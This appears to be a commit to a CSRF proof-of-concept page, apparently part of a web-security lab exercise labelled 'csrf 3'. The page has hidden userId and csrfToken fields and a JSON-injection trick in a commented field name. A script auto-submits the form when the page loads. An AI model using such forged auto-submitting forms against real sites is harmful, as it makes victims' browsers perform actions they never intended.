csrf 3 ist bugged?????????

--- a/index.html
+++ b/index.html
@@ -4,12 +4,14 @@
 <input type="hidden" name="userId" value="398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8"/>
 <input type="hidden" name="csrfToken" value="-47246621724203473616367418901910017623"/>
 <!--input type="hidden" name='{"userId":"398a2626d934ee0e28e46e4c5d5c1cab10e1a9b8","' value='":"end"}'-->
+<input type="submit"/>
 </form>
 <script>
   document.csrf.submit();
 </script>
 </body>
 </html>
+
 
 
 
